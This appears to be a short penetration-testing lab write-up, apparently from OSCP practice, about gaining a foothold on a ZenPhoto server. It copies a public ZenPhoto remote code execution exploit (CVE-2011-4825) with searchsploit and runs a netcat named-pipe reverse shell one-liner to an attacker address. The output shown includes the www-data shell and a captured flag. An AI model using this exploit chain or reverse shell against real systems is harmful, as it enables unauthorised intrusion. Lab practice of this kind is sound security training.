Foothold
http://192.168.246.41/test/doc_files/zenphoto_database_quick_reference.pdf
Last updated
http://192.168.246.41/test/doc_files/zenphoto_database_quick_reference.pdfLast updated
❯ searchsploit -m 18083
Exploit: ZenPhoto 1.4.1.4 - 'ajax_create_folder.php' Remote Code Execution
URL: https://www.exploit-db.com/exploits/18083
Path: /usr/share/exploitdb/exploits/php/webapps/18083.php
Codes: OSVDB-76928, CVE-2011-4825
Verified: True
File Type: PHP script, ASCII text
Copied to: /home/adot/oscp/pg/zenphoto/18083.php
zenphoto-shell# rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.45.239 1337 >/tmp/f❯ nc -lnvp 1337
listening on [any] 1337 ...
connect to [192.168.45.239] from (UNKNOWN) [192.168.246.41] 56103
sh: can't access tty; job control turned off
$ whoami
www-data
$ cat /home/local.txt
1e4c419fcf0820c46f16ee67b9c3198c
$ ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
3: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000
link/ether 00:50:56:bf:90:85 brd ff:ff:ff:ff:ff:ff
inet 192.168.246.41/24 brd 192.168.246.255 scope global eth0
inet6 fe80::250:56ff:febf:9085/64 scope link
valid_lft forever preferred_lft forever